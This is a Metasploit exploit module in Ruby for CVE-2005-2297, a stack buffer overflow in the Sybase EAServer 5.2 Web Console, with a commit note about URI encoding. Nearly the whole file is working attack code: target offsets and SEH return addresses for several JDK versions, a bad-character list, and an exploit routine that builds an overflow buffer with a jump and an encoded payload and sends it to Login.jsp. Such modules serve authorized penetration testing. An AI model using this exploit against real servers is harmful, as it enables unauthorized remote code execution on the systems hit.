wchen-r7
4f903a604c
Fix #5103. By default, Httpclient will encode the URI but we don't necessarily want that. These modules originally didn't use URI encoding when they were written so we should just keep them that way.
87 lines
2.7 KiB
Ruby
87 lines
2.7 KiB
Ruby
##
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
require 'msf/core'
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
Rank = AverageRanking
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'Sybase EAServer 5.2 Remote Stack Buffer Overflow',
|
|
'Description' => %q{
|
|
This module exploits a stack buffer overflow in the Sybase EAServer Web
|
|
Console. The offset to the SEH frame appears to change depending
|
|
on what version of Java is in use by the remote server, making this
|
|
exploit somewhat unreliable.
|
|
},
|
|
'Author' => [ 'Unknown' ],
|
|
'License' => MSF_LICENSE,
|
|
'References' =>
|
|
[
|
|
[ 'CVE', '2005-2297' ],
|
|
[ 'OSVDB', '17996' ],
|
|
[ 'BID', '14287'],
|
|
],
|
|
'Privileged' => false,
|
|
'DefaultOptions' =>
|
|
{
|
|
'EXITFUNC' => 'thread',
|
|
},
|
|
'Payload' =>
|
|
{
|
|
'Space' => 1000,
|
|
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\%",
|
|
'StackAdjustment' => -3500,
|
|
},
|
|
'Platform' => 'win',
|
|
'Targets' =>
|
|
[
|
|
# Technically we could combine these into a single multi-return string...
|
|
['Windows All - Sybase EAServer 5.2 - jdk 1.3.1_11', {'Ret' => 0x6d4548ff, 'Offset' => 3820}],
|
|
['Windows All - Sybase EAServer 5.2 - jdk 1.3.?.?', {'Ret' => 0x6d4548ff, 'Offset' => 3841}],
|
|
['Windows All - Sybase EAServer 5.2 - jdk 1.4.2_06', {'Ret' => 0x08041b25, 'Offset' => 3912}],
|
|
['Windows All - Sybase EAServer 5.2 - jdk 1.4.1_02', {'Ret' => 0x08041b25, 'Offset' => 3925}],
|
|
],
|
|
'DisclosureDate' => 'Jul 25 2005'))
|
|
|
|
register_options(
|
|
[
|
|
OptString.new('DIR', [ true, "Directory of Login.jsp script", '/WebConsole/' ]),
|
|
Opt::RPORT(8080)
|
|
], self.class)
|
|
end
|
|
|
|
def exploit
|
|
|
|
print_status( "Attempting to exploit...")
|
|
|
|
# Building the evil buffer
|
|
crash = rand_text_alphanumeric(5000, payload_badchars)
|
|
crash[ target['Offset'] - 4, 2 ] = "\xeb\x06"
|
|
crash[ target['Offset'] , 4 ] = [target.ret].pack('V')
|
|
crash[ target['Offset'] + 4, payload.encoded.length ] = payload.encoded
|
|
|
|
# Sending the request
|
|
res = send_request_cgi({
|
|
'uri' => normalize_uri(datastore['DIR'], 'Login.jsp'),
|
|
'method' => 'GET',
|
|
'encode_params' => false,
|
|
'headers' => {
|
|
'Accept' => '*/*',
|
|
},
|
|
'vars_get' => {
|
|
crash => nil
|
|
}
|
|
}, 5)
|
|
|
|
print_status("Overflow request sent, sleeping for four seconds")
|
|
select(nil,nil,nil,4)
|
|
end
|
|
|
|
end
|